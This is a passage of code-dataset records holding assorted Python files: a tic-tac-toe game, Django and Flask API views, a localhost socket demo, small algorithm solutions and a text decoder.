#train_loss3, accv3 = mlp.four_NN_train_and_val(train_loader, validation_loader, lr=0.001)\n\n epochs = range(1, EPOCHS + 1) \n\n #plt.figure(1)\n #plt.plot(epochs, fl_train_loss1, '-b', label='4-layer w/ sigmoid activation')\n #plt.plot(epochs, train_loss1, '-r', label='3-layer w/ sigmoid activation')\n #plt.legend(loc='lower right')\n #plt.xlabel('Number of epochs')\n #plt.ylabel('Average Negative Log Loss')\n #plt.title('Negative Log Likelihood Loss on Training Data as a Function of Epochs')\n #plt.savefig(\"fl_training_loss.png\")\n #print 'Plot saved as \"fl_training_loss.png\"'\n\n #plt.figure(2)\n #plt.plot(epochs, fl_accv1, '-b', label='4-layer w/ sigmoid activation')\n #plt.plot(epochs, accv1, '-r', label='3-layer w/ sigmoid activaction')\n #plt.legend(loc='lower right')\n #plt.xlabel('Number of epochs')\n #plt.ylabel('Accuracy (Percentage)')\n #plt.title('Classifier Accuracy on Validation Data as a Function of Epochs')\n #plt.savefig(\"fl_accuracy.png\")\n #print 'Plot saved as \"fl_accuracy.png\"'\n\n print(\"Results of validation on testing set with four-layer net:\")\n lossv, accv = [], []\n mlp.validate(lossv, accv, four_layer_model, test_loader)\n\n print(\"Results of validation on testing set with three-layer net:\")\n lossv, accv = [], []\n mlp.validate(lossv, accv, three_layer_model, test_loader)\n\n \n","sub_path":"src/assignment_3/mlp_four_layer.py","file_name":"mlp_four_layer.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"272696028","text":"import os\nimport signal\nimport sys\nimport time\nfrom optparse import make_option\nfrom subprocess import Popen\n\nfrom django.core.management.base import BaseCommand\n\n\nclass Command(BaseCommand):\n\n # I'd like to use 
--application and --version, but --version is already\n # included in BaseCommand.option_list, and for being consistent, I'm\n # using app-id and app-version\n option_list = BaseCommand.option_list + (\n make_option('--app-id', '-A', dest='application', default=None,\n help='Set the application, overriding the application value from app.yaml file.'),\n make_option('--app-version', '-V', dest='version', default=None,\n help='Set the (major) version, overriding the version value from app.yaml file.'),\n )\n help = \"Deploy your application into Google App Engine\"\n\n def handle(self, *args, **options):\n shutdown_message = options.get('shutdown_message', '')\n application = options.get('application')\n version = options.get('version')\n\n from djangae.boot import setup_paths, find_project_root\n setup_paths()\n\n project_root = find_project_root()\n\n expected_path = os.path.join(project_root, \"app.yaml\")\n if not os.path.exists(expected_path):\n sys.stderr.write(\"Unable to find app.yaml at '%s'\\n\" % expected_path)\n sys.exit(1)\n\n # Will have been set by setup_paths\n sdk_path = os.environ['APP_ENGINE_SDK']\n\n appcfg = os.path.join(sdk_path, \"appcfg.py\")\n\n # very simple for now, only runs appcfg.py update . and some\n # extra parameters like app id or version\n\n command = [\n appcfg,\n \"update\",\n project_root\n ]\n\n if application:\n command += [\"-A\", application]\n if version:\n command += [\"-V\", version]\n\n process = Popen(\n command,\n stdout=sys.__stdout__,\n stderr=sys.__stderr__,\n cwd=project_root\n )\n\n try:\n process.wait()\n except KeyboardInterrupt:\n #Tell the dev appserver to shutdown and forcibly kill\n #if it takes too long\n process.send_signal(signal.SIGTERM)\n time.sleep(2)\n process.kill()\n\n if shutdown_message:\n sys.stdout.write(shutdown_message)\n\n sys.exit(process.returncode)\n","sub_path":"djangae/management/commands/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"368817890","text":"import random\n\nboard = [[\"-\",\"-\",\"-\"],[\"-\",\"-\",\"-\"],[\"-\",\"-\",\"-\"]] # Assigns an empty board \nturn = \"X\" # Sets the initial player/turn to X\n\ndef print_board():\n \"\"\"\n Prints out the board to the console.\n\n Argument(s):\n None\n\n Output:\n None\n \"\"\"\n for i in range(3):\n for y in range(3):\n print(board[y][i], end=\" \")\n print(\"\\n\")\n\ndef switch_turns():\n \"\"\"\n Sets global variable 'turn' from either X to O or the other way around\n\n Argument(s):\n None\n\n Output:\n None\n \"\"\"\n global turn\n if turn == \"X\":\n nextTurn = \"O\"\n else:\n nextTurn = \"X\"\n turn = nextTurn\n\ndef convert_from_numpad(num):\n \"\"\"\n Converts an integer, ranging from 1 to 9, into a useable position on the board. Ex: The integer '7' would output the position [0,0], ie. the top left position on the board, since '7' is the top left number on a numpad.\n\n Argument(s):\n num -- the integer to be converted into a position\n\n Output: \n A list consisting of two integers, both ranging from 0 to 2. 
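For example, convert_from_numpad(7) returns [0, 0] (top left) and\n convert_from_numpad(3) returns [2, 2] (bottom right), mirroring the numpad layout.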
\n \"\"\"\n position = [0,0]\n\n if num == 7 or num == 8 or num == 9:\n position[1] = 0\n elif num == 4 or num == 5 or num == 6:\n position[1] = 1\n elif num == 1 or num == 2 or num == 3:\n position[1] = 2\n\n if num == 7 or num == 4 or num == 1:\n position[0] = 0\n elif num == 8 or num == 5 or num == 2:\n position[0] = 1\n elif num == 9 or num == 6 or num == 3:\n position[0] = 2\n\n return position\n\ndef update_board(position, turn):\n \"\"\"\n Updates the board.\n\n Argument(s):\n position -- a list consisting of two integers, ranging from 0 to 2; the position on the board that is going to be updated\n turn -- a string; either 'X' or 'O'; the string to place on the board\n\n Output:\n None\n \"\"\"\n board[position[0]][position[1]] = turn\n\ndef check_availability(position):\n \"\"\"\n Evaluates whether a specified position on the board is empty or not.\n\n Argument(s):\n position -- a list consisting of two integers, ranging from 0 to 2; the position to evaluate if empty or not\n\n Output:\n Returns True if the position is empty and False if not.\n \"\"\"\n if board[position[0]][position[1]] == \"-\":\n return True\n else:\n return False\n\ndef check_for_win(localBoard, lastPosition, turn):\n \"\"\"\n Evaluates whether a specified board contains a row of three marks of the same kind or not.\n\n Argument(s):\n localBoard -- a list consisting of three separate lists, which in turn are consisting of three strings, either '-', 'X' or 'O'; the board to evaluate a win on\n lastPosition -- a list consisting of two integers, ranging from 0 to 2; the last position that was placed on the board\n turn -- a string, either 'X' or 'O'; the type of the last placed mark\n\n Output:\n Returns True if there is a row with three marks of the same kind and False if not.\n \"\"\"\n \n # Looks for a win on the horizontal row connected to variable lastPosition\n inRow = 0\n for i in range(3):\n if str(localBoard[i][lastPosition[1]]) == turn:\n inRow += 1\n else:\n break\n if inRow == 3:\n return True\n\n # Looks for a win on the vertical row connected to variable lastPosition\n inRow = 0\n for i in range(3):\n if str(localBoard[lastPosition[0]][i]) == turn:\n inRow += 1\n else:\n break\n if inRow == 3:\n return True\n\n # Looks for a win on the diagonal row going downwards \n inRow = 0\n for i in range(3):\n if str(localBoard[i][i]) == turn:\n inRow += 1\n else:\n break\n if inRow == 3:\n return True\n\n # Looks for a win on the diagonal row going upwards\n inRow = 0\n for i,j in zip(range(2,-1,-1),range(3)):\n if str(localBoard[i][j]) == turn:\n inRow += 1\n else:\n break\n if inRow == 3:\n return True\n\n return False # Returns False if none of the above if statements are true\n\ndef check_for_draw():\n \"\"\"\n Evaluates if no position on the board is empty or not.\n\n Argument(s):\n None\n\n Output:\n Returns True if the whole board is filled and False if not.\n \"\"\"\n for i in range(3):\n for j in range(3):\n if board[i][j] == \"-\":\n return False\n return True\n\ndef find_possible_win():\n \"\"\"\n Finds one or multiple rows on the board that is empty, except for one 'O'.\n\n Argument(s):\n None\n\n Output:\n Returns None if no rows meet the criteria or a list consisting of the rows that meet the criteria. Those rows are lists consisting of the two empty positions in the row. 
The positions are lists consisting of two integers, ranging from 0 to 2.\n \"\"\"\n rowList = [] # List of all rows that meet the criteria\n \n # Looks for vertical rows meeting the criteria, and appends them to rowList if they do\n for i in range(3):\n OPos = 0\n emptyPos = 0\n validRow = []\n for j in range(3):\n if board[i][j] == \"O\":\n OPos += 1\n elif board[i][j] == \"-\":\n emptyPos += 1\n validRow.append([i,j])\n else:\n break\n if OPos == 1 and emptyPos == 2:\n rowList.append(validRow)\n\n # Looks for horizontal rows meeting the criteria, and appends them to rowList if they do\n for i in range(3):\n OPos = 0\n emptyPos = 0\n validRow = []\n for j in range(3):\n if board[j][i] == \"O\":\n OPos += 1\n elif board[j][i] == \"-\":\n emptyPos += 1\n validRow.append([j,i])\n else:\n break\n if OPos == 1 and emptyPos == 2:\n rowList.append(validRow)\n\n # Evaluates whether the diagonal row going downwards meets the criteria or not, and appends it to rowList if it does\n OPos = 0\n emptyPos = 0\n validRow = []\n for i in range(3):\n if board[i][i] == \"O\":\n OPos += 1\n elif board[i][i] == \"-\":\n emptyPos += 1\n validRow.append([i,i])\n else:\n break\n if OPos == 1 and emptyPos == 2:\n rowList.append(validRow)\n\n # Evaluates whether the diagonal row going upwards meets the criteria or not, and appends it to the rowList if it does\n OPos = 0\n emptyPos = 0\n validRow = []\n for i, j in zip(range(2, -1, -1), range(3)):\n if board[i][j] == \"O\":\n OPos += 1\n elif board[i][j] == \"-\":\n emptyPos += 1\n validRow.append([i,j])\n else:\n break\n if OPos == 1 and emptyPos == 2:\n rowList.append(validRow)\n\n if len(rowList) > 0:\n return rowList\n else:\n return None\n\ndef try_positions(type):\n \"\"\"\n Evaluates whether there is a position on the board where a placement there would result in a win or not\n\n Argument(s):\n type -- a string, either 'X' or 'O'; the type of mark to locally place on the board to check for a win\n\n Output:\n Returns a list consisting of two integers, ranging from 0 to 2, if a position meeting the criteria exists, and None if not. 
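For instance, if \"O\" needs only one more square to complete a row,\n try_positions(\"O\") returns that square's position.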
\n \"\"\"\n for i in range(3):\n for j in range(3):\n if check_availability([i,j]):\n localBoard = [board[0][:], board[1][:], board[2][:]]\n localBoard[i][j] = type\n if check_for_win(localBoard, [i,j], type):\n return [i,j]\n return None\n\ndef computers_turn():\n \"\"\"\n Finds the position on the board where it makes most sense for the computer to place on, based on a set of priority rules.\n\n Argument(s):\n None\n \n Output:\n Returns a list consisting of two integers, ranging from 0 to 2; the position that meets the criteria.\n \"\"\"\n # Looks for a position where a placement would result in a win for the computer and, if found, returns it\n posO = try_positions(\"O\")\n if posO != None:\n return posO\n\n # Looks for a position where a placement would result in a win for the player and, if found, returns it\n posX = try_positions(\"X\")\n if posX != None:\n return posX\n\n # Looks for a row the computer could place on and win in a later turn and, if found, returns a random position from it\n rowList = find_possible_win()\n if rowList != None:\n row = random.choice(rowList)\n return random.choice(row)\n else:\n # Finds a random available position on the board and returns it\n while True:\n y = random.randrange(3)\n x = random.randrange(3)\n if check_availability([x,y]):\n return [x,y]\n\ndef players_turn():\n \"\"\"\n Gets the position the player wants to place on.\n\n Argument(s):\n None\n\n Output:\n None\n \"\"\"\n while True:\n try:\n i = int(input())\n except:\n print(\"Please enter an integer between 1 and 9\")\n continue\n else:\n position = convert_from_numpad(int(i))\n if int(i)< 1 or int(i) > 9:\n print(\"Please enter an integer between 1 and 9\")\n elif not check_availability(position):\n print(\"Cannot place at that position\")\n else:\n break\n return position\n\ndef play_game():\n \"\"\"\n Plays a full game of player versus player.\n\n Argument(s):\n None\n\n Output:\n None\n \"\"\"\n while True:\n print_board()\n print(\"Turn:\", turn)\n position = players_turn()\n update_board(position, turn)\n if check_for_win(board, position, turn):\n print_board()\n print(turn, \"wins\")\n return None\n elif check_for_draw():\n print_board()\n print(\"Draw\", \"\\n\")\n return None\n switch_turns()\n\ndef play_game_against_computer():\n \"\"\"\n Plays a full game of player versus computer.\n\n Argument(s):\n None\n\n Output:\n Returns None after a win or a draw.\n \"\"\"\n while True:\n if turn == \"X\": # If it's the player's turn, do the following\n print_board()\n print(\"Your turn\")\n position = players_turn()\n update_board(position, turn)\n if check_for_win(board, position, turn):\n print_board()\n print(\"You win\")\n return None\n elif check_for_draw():\n print_board()\n print(\"Draw\", \"\\n\")\n return None\n switch_turns()\n else: # If it's the computer's turn, do the following\n position = computers_turn()\n update_board(position, turn)\n if check_for_win(board, position, turn):\n print_board()\n print(\"The computer wins\")\n return None\n elif check_for_draw():\n print_board()\n print(\"Draw\", \"\\n\")\n return None\n switch_turns()\n print(\"Draw\")\n\ndef main():\n \"\"\"\n Acts as the 'main menu' that let's the player choose to play against the computer or not, and who should start. 
After a full game the player gets the choice to play again or exit the program.\n\n Argument(s):\n None\n\n Output:\n Returns None if the player chooses not to play again after a full game\n \"\"\"\n global board, turn\n while True:\n i = input(\"Do you want to play against the computer? y/n \")\n if i == \"y\":\n while True:\n i = input(\"Do you want to start? y/n \")\n if i == \"y\":\n play_game_against_computer()\n break\n elif i == \"n\":\n switch_turns()\n play_game_against_computer()\n break\n else:\n print(\"Invalid input, try again\")\n elif i == \"n\":\n while True:\n i = input(\"Do you want X to start? y/n \")\n if i == \"y\":\n play_game()\n break\n elif i == \"n\":\n switch_turns()\n play_game()\n break\n else:\n print(\"Invalid input, try again\")\n else:\n print(\"Invalid input, try again\")\n continue\n \n # This loop triggers after a full game has been played\n while True:\n i = input(\"Do you want to play again? y/n \")\n if i == \"y\":\n board = [[\"-\",\"-\",\"-\"],[\"-\",\"-\",\"-\"],[\"-\",\"-\",\"-\"]]\n turn = \"X\"\n break\n elif i == \"n\":\n return None\n else:\n print(\"Invalid input, try again\")\n\nmain()","sub_path":"TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":12844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"311710976","text":"def maxProfitAssignment(self, difficulty, profit, workers):\n n = len(difficulty)\n i = result = best = 0\n\n jobs = sorted(zip(difficulty, profit)) # zip() returns an iterator with no .sort() on Python 3\n 
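# For illustration: with jobs sorted by difficulty and workers sorted by skill,\n # the shared index i below only moves forward across all workers, so the scan\n # costs O(n + m) on top of the two sorts.\n 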
workers.sort()\n\n for skill in workers:\n while i < n and skill >= jobs[i][0]:\n best = max(best, jobs[i][1])\n i += 1\n\n result += best\n\n return result","sub_path":"MostProfitAssigningWork.py","file_name":"MostProfitAssigningWork.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"244377058","text":"'''\nFind the minimum depth of a Binary tree\n'''\n# class TreeNode(object):\n# def __init__(self, val):\n# self.val = val\n# self.left = left\n# self.right = right\ndef Solution(object):\n #iterative approach\n def minDepth(self, root):\n if not root: return 0\n stack = [(root, 1)]\n while stack:\n item = stack.pop(0)\n if not item[0]: continue\n if not item[0].left and not item[0].right: item[1]\n else:\n stack.append((item[0].left,item[1]+1))\n stack.append((item[0].right,item[1]+1))\n\n #recurssive approach\n def minDepth(self, root):\n if not root: return 0\n d = map(self.minDepth, (root.left, root.right))\n return 1 + (min(d) or max(d))\n\n #recurssive approach2\n def minDepth(self, root):\n if not root: return 0\n if not root.left or not root.right :\n return max(self.minDepth(root.left), self.minDepth(root.right)) +1\n else:\n return min(self.minDepth(root.left), self.minDepth(root.right))+1\n","sub_path":"Trees/Minimum_Depth_BTree_111.py","file_name":"Minimum_Depth_BTree_111.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"45517323","text":"import re\nfrom typing import Union\n\nfrom .exceptions import SeparatorPositionException, SeparatorsNumberException\nfrom .settings import SEPARATOR\n\n\nclass Decoder:\n \"\"\"Decorder class\n Prepared for decoding text encoded by WeirdText encoder.\n \"\"\"\n\n def decode(self, encoded_text: str) -> str:\n \"\"\"Method decoding encoded text by WeirdText encoder.\n Args:\n encoded_text: Text to decoded.\n Returns:\n Decoded string.\n \"\"\"\n text, words_list = self._preprocess_raw_text(encoded_text)\n # regex for finding words longer than 3 - only this words could be encoded\n words_regex = re.compile(r\"[\\w+]{4,}\", re.U)\n\n # iterating through all encoded words to replace them with decoded ones\n for word in words_regex.finditer(text):\n start, end = word.span()\n current_encoded = text[start:end]\n\n # finding matching word from list to replace encoded one\n for i in range(len(words_list)):\n current_word = words_list[i]\n\n if self._is_valid_replacement(current_encoded, current_word):\n # replacing encoded word in text with original one\n text = text[:start] + current_word + text[end:]\n # removing word from list as it is no more needed\n del words_list[i]\n break\n\n return text\n\n def _preprocess_raw_text(self, text: str) -> Union[str, list]:\n \"\"\"Method preprocessing raw text passed to decoder.\n\n First text will be validated by checking number of separators\n and position of first one found. 
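        Editorial note appended to this record: in `_is_valid_replacement`
        further down, `encoded_word[-1:1]` and `current_word[-1:1]` are empty
        slices for every word of length >= 2 (and the decoder only touches
        words of length >= 4), so the permutation check always compares two
        empty strings; the interior slice `[1:-1]` was almost certainly
        intended. Likewise, the Minimum_Depth_BTree_111.py record above
        declares `def Solution(object):` where `class Solution(object):` was
        meant, and its iterative minDepth computes `item[1]` for a leaf
        without returning it. A corrected iterative sketch, assuming the
        usual TreeNode definition:

            from collections import deque

            def minDepth(root):
                if not root:
                    return 0
                queue = deque([(root, 1)])  # (node, depth) pairs, BFS order
                while queue:
                    node, depth = queue.popleft()
                    if not node.left and not node.right:
                        return depth  # first leaf reached is the shallowest
                    if node.left:
                        queue.append((node.left, depth + 1))
                    if node.right:
                        queue.append((node.right, depth + 1))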
Than raw text will be split\n into encoded sentence (only) and list of original words.\n Args:\n text: Raw text to preprocess.\n Returns:\n Encoded sentence (only) and list of original words.\n \"\"\"\n found_separators = re.finditer(SEPARATOR, text)\n\n separator_list = [x for x in found_separators]\n\n if len(separator_list) != 2:\n raise SeparatorsNumberException(\n \"Encoded text does not have two separators.\"\n )\n\n if separator_list[0].span()[0] != 0:\n raise SeparatorPositionException(\n \"Encoded text does not begin with proper separator.\"\n )\n\n return text[separator_list[0].span()[1] : separator_list[1].span()[0]], text[\n separator_list[1].span()[1] :\n ].split(\" \")\n\n def _is_permutation(self, word: str, pattern: str) -> bool:\n \"\"\"Method checking if word characters are permutation of pattern.\n\n There are two dictionaries having characters of words as keys and\n number of occurrences in word as values. If they are the same words\n are permutation of each other.\n Args:\n word: Base word.\n pattern: Pattern to compare base word with.\n Returns:\n Information if word is permutation of pattern.\n \"\"\"\n return self._prepare_counting_dict(word) == self._prepare_counting_dict(pattern)\n\n def _prepare_counting_dict(self, word: str) -> dict:\n \"\"\"Method generating dictionary from word.\n\n Each character is set as key and number of its occurrences is\n value.\n Args:\n word: Word to generate dictionary.\n Returns:\n Dictionary generated from word.\n \"\"\"\n word_dict = {}\n for char in word:\n word_dict[char] = word_dict.setdefault(char, 0) + 1\n return word_dict\n\n def _is_valid_replacement(self, encoded_word: str, current_word: str) -> bool:\n \"\"\"Method checking if encoded word should be replaced with current word from list.\n\n Each character is set as key and number of its occurrences is\n value.\n Args:\n encoded_word: Encoded word from sentence.\n current_word: Potential replacement from list.\n Returns:\n Information if current_word is proper replacement for encoded_word.\n \"\"\"\n return (\n len(current_word) == len(encoded_word)\n and encoded_word[0] == current_word[0]\n and encoded_word[-1] == current_word[-1]\n and self._is_permutation(encoded_word[-1:1], current_word[-1:1])\n )\n","sub_path":"weirdtextapi/textprocessing/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"643029798","text":"from socket import *\r\nimport time\r\nimport numpy as np\r\nimport struct\r\nfrom PyQt5.QtCore import QThread\r\n\r\ndef server():\r\n\r\n host = \"127.0.0.1\"\r\n port = 12345\r\n\r\n serverSocket = socket(AF_INET, SOCK_STREAM)\r\n serverSocket.bind((host, port))\r\n serverSocket.listen(1)\r\n print(\"Waiting for client\")\r\n\r\n connectionSocket, addr = serverSocket.accept()\r\n print('connection in', str(connectionSocket))\r\n\r\n f1 = 35 # frequency 1 (Hz)\r\n f2 = 10 # frequency 2 (Hz)\r\n\r\n start = time.time()\r\n i = 0\r\n \r\n while True:\r\n # time\r\n now_time = time.time() - start\r\n\r\n # original signal\r\n signal = 0.6 * np.sin(2 * np.pi * f1 * now_time) + 3 * np.cos(2 * np.pi * f2 * now_time + np.pi/2) # 복잡한 신호\r\n # signal = np.sin(2 * np.pi * f2 * now_time) # 간단한 신호\r\n\r\n time.sleep(0.01)\r\n\r\n data = str(now_time) + ' ' + str(signal) + '\\n'\r\n\r\n connectionSocket.send(data.encode('utf-8'))\r\n\r\n i += 1\r\n\r\n 
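    # Editorial note: the serverSocket.close() below is unreachable -- the
    # `while True` send loop above never breaks -- so neither connectionSocket
    # nor serverSocket is ever released cleanly; wrapping the loop in
    # try/finally (or breaking out when send() raises) would fix that.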
serverSocket.close()\r\n\r\n\r\nserver()","sub_path":"measurement/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"334963880","text":"\"\"\"Handle requests made on reviews\"\"\"\nimport os\nfrom api import create_app, db\n\n@app.route('/api/v2/businesses//reviews',\n methods=['POST'])\n@check_json\n@token_required\n@check_for_login\ndef add_review_for(current_user, content, business_id):\n \"\"\"Add a review for a business.\"\"\"\n message = validator.validate(content, 'review_reg')\n if message:\n return jsonify(message), 400\n to_review = Business.query.filter_by(id=business_id).first()\n if not to_review:\n return jsonify({'msg': 'Business id is incorrect'}), 400\n if to_review.business_owner == current_user.username:\n return jsonify({'msg': 'Reviewing own business not allowed'}), 400\n review = Review(rating=int(str(content['rating']).strip()),\n body=content['body'].strip(),\n owner=current_user,\n review_for=to_review)\n db.session.add(review)\n db.session.commit()\n message = {'msg': 'Review for business id {} by user {} created'.format(\n review.business_id, review.review_owner),\n 'details': {'rating': review.rating,\n 'body': review.body}}\n return jsonify(message), 201\n\n\n@app.route('/api/v2/businesses//reviews',\n methods=['GET'])\ndef get_reviews_for(business_id):\n \"\"\"Retrieve all reviews for a single business.\"\"\"\n business = Business.query.filter_by(id=business_id).first()\n if not business:\n return jsonify({'msg': 'Business id is incorrect'}), 400\n reviews = Review.query.filter_by(business_id=business_id)\n if not reviews.count():\n return jsonify({'msg': 'No reviews for this business'}), 400\n message = {'reviews': [{'rating': review.rating,\n 'body': review.body,\n 'review_by': review.review_owner}\n for review in reviews],\n 'business_id': business.id,\n 'business_owner': business.business_owner}\n return jsonify(message), 200\n","sub_path":"api/routes/review.py","file_name":"review.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"476954449","text":"# File name: feet_to_meters\n# Name: Kit Wei Min\n# Description: Converts length from feet to meters\n\n# Prompts for the length in feet\nfeet = float(input(\"Length in feet = \"))\n\n# Converts feet to meters\nmeter = feet * 0.305\n\n# Displays result\nprint(\"Length in meters = {0:<10.3f}\".format(meter))\n","sub_path":"Practical 1/Practical 1(complete)/Practical 1/kitwm_p01q03.py","file_name":"kitwm_p01q03.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"300795270","text":"import matplotlib.pyplot as plt\n\nX = [3,6,9,12,15,18,21,24,27]\nY = [55000,66300,77500,83000,83200,83500,68500,60000,80500]\n\nplt.plot(X,Y,marker='o')\nplt.title(\"Sentiment Analysis\")\nplt.xlabel('Time (in mins)')\naxes = plt.gca()\naxes.set_xlim([0,30])\nplt.ylabel('Number of tweets processed')\nplt.show()\n\n# total = 0\n# for x in Y:\n# \ttotal = total + x\n\n# result = float(total/(27*60.0))\n# print result\n","sub_path":"ds256-a2/Plots/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"503033352","text":"import random\nfrom django.conf import settings\nfrom django.http import HttpResponse, 
Http404, JsonResponse\nfrom django.shortcuts import render, redirect\nfrom django.utils.http import is_safe_url\n\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view ,permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom .serializers import *\nfrom .models import *\nfrom .forms import *\n\nALLOWED_HOSTS = settings.ALLOWED_HOSTS\n\n\n\ndef home(request):\n return render(request, \"pages/index.html\", status=200)\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef tweet_create(request, *args, **kwargs):\n user = request.user\n serializer = TweetCreateSerializer(data=request.POST)\n if serializer.is_valid(raise_exception=True):\n data_chunk = serializer.save(user= user)\n return Response(serializer.data, status=201)\n return Response({},status=400)\n\n\n\n\n\n@api_view(['GET'])\ndef tweet_list(request):\n data_set = Tweets.objects.all()\n serializer = TweetSerializer(data_set, many=True)\n return Response(serializer.data)\n\n\n\n@api_view(['GET'])\ndef detail_view(request, tweet_id):\n data_set = Tweets.objects.filter(id=tweet_id)\n if not data_set.exists():\n return Response({}, status=404)\n data_set = data_set.first()\n serializer = TweetSerializer(data_set)\n return Response(serializer.data, status=200)\n\n\n\n@api_view([\"DELETE\", \"POST\"])\n@permission_classes([IsAuthenticated])\ndef delete_view(request, tweet_id):\n data_set = Tweets.objects.filter(id=tweet_id)\n if not data_set.exists():\n return Response({}, status=404)\n data_set = data_set.filter(user=request.user)\n if not data_set.exists():\n return Response({\"message\": \"error\"}, status=401)\n data = data_set.first()\n data.delete()\n return Response({\"message\": \"Tweet removed\"}, status=200)\n\n@api_view([\"POST\"])\ndef like_view(request,*args, **kwargs):\n \n serializer = TweetLikeSerializer(data=request.data)\n if serializer.is_valid(raise_exception = True):\n data = serializer.validated_data\n tweet_id = data.get(\"tweet_id\")\n action = data.get(\"action\")\n content = data.get(\"content\")\n data_set = Tweets.objects.filter(id=tweet_id)\n if not data_set.exists():\n return Response({}, status=404)\n data = data_set.first()\n if action == \"like\":\n data.likes.add(request.user)\n serializer = TweetSerializer(data)\n return Response(serializer.data, status=200)\n elif action == \"unlike\":\n data.likes.remove(request.user)\n elif action == \"retweet\": \n new_tweet = Tweets.objects.create(user = request.user, parent=data,content= content)\n serializer = TweetSerializer(new_tweet)\n return Response(serializer.data, status=200)\n return Response({}, status=200)","sub_path":"tweets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"541447025","text":"import dash_html_components as html\nimport feffery_antd_components as fac\nfrom dash.dependencies import Input, Output\n\nfrom server import app\n\n\n@app.callback(\n Output('tree-demo-output', 'children'),\n [Input('tree-demo', 'selectedKeys'),\n Input('tree-demo', 'checkedKeys')],\n prevent_initial_call=True\n)\ndef tree_callback_demo(selectedKeys, checkedKeys):\n import time;time.sleep(1)\n\n return [\n fac.AntdTitle('selectedKeys:', level=5),\n html.Pre(str(selectedKeys)),\n\n fac.AntdTitle('checkedKeys:', level=5),\n html.Pre(str(checkedKeys))\n 
]\n","sub_path":"callbacks/AntdTree.py","file_name":"AntdTree.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"458960810","text":"g=int(input())\nflag=0\nif(g>2):\n for i in range(2,int(g/2)+1):\n if g%i==0:\n print(\"yes\")\n flag=1\n break\nif flag==0 or g==2:\n print(\"no\")\n","sub_path":"comp.py","file_name":"comp.py","file_ext":"py","file_size_in_byte":182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"467690826","text":"import socket\nfrom time import sleep\nimport sys\n\nHOST, PORT = \"localhost\", 3288\ndata = \"hello\"\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ntry:\n sock.connect((HOST, PORT))\n while 1:\n try:\n print(\"Enter:\")\n line = sys.stdin.readline()\n except KeyboardInterrupt:\n break\n\n if not line:\n break\n\n sock.send(bytes(line + \"\\n\", \"utf-8\"))\n received = sock.recv(1024)\nfinally:\n sock.close()\n\n\"\"\"\nsame as:\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\n\n sock.connect((HOST, PORT))\n sock.send(bytes(data + \"\\n\", \"utf-8\"))\n received = sock.recv(1024)\n sleep(3)\n sock.send(bytes(data + \"\\n\", \"utf-8\"))\n received = sock.recv(1024)\n sleep(3)\n sock.send(bytes(data + \"\\n\", \"utf-8\"))\n received = sock.recv(1024)\n\n\"\"\"\n","sub_path":"io/client_3.py","file_name":"client_3.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"536905589","text":"from setuptools import setup, find_packages\n\ntry: \n\tlong_desc = open('README.md').read()\nexcept:\n\tlong_desc = ''\nsetup(\n\tname = \"saveb\",\n\turl = \"https://github.com/jdavidd/download\",\n\tauthor = \"Jitca David\",\n\tauthor_email = \"j@yahoo.com\",\n\tversion = \"0.0.5\",\n\tpackages = find_packages(),\n\tinstall_requires = [\n\t \"saveapi==0.0.3\",\n\t \"jupyter==1\",\n\t \"argparse==1.1\"\n\t \"msgpack==0.5.6\",\n\t],\n\tinclude_package_data=True,\n\tdescription=\"A button\",\n\tlong_description=long_desc,\n\t \n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"600585015","text":"import pytest\nimport yaml\nfrom click.testing import CliRunner\nfrom mock import MagicMock\nfrom aws_ami_creator.cli import *\n\n\ndef test_get_user_data_script():\n get_user_data_script('', {'init_scripts': []}, {})\n\n\ndef test_prepare_template_vars():\n prepare_template_vars(['a=1'], {'vars': {'a': 'some var'}})\n\n\ndef test_print_version():\n runner = CliRunner()\n\n with runner.isolated_filesystem():\n result = runner.invoke(cli, ['--version'], catch_exceptions=False)\n\n assert 'AWS AMI Creator' in result.output\n assert result.exit_code == 0\n\n\ndef test_create(monkeypatch):\n\n monkeypatch.setattr('boto.vpc.connect_to_region', MagicMock())\n monkeypatch.setattr('boto.ec2.connect_to_region', MagicMock())\n monkeypatch.setattr('time.sleep', lambda s: None)\n sshclient = 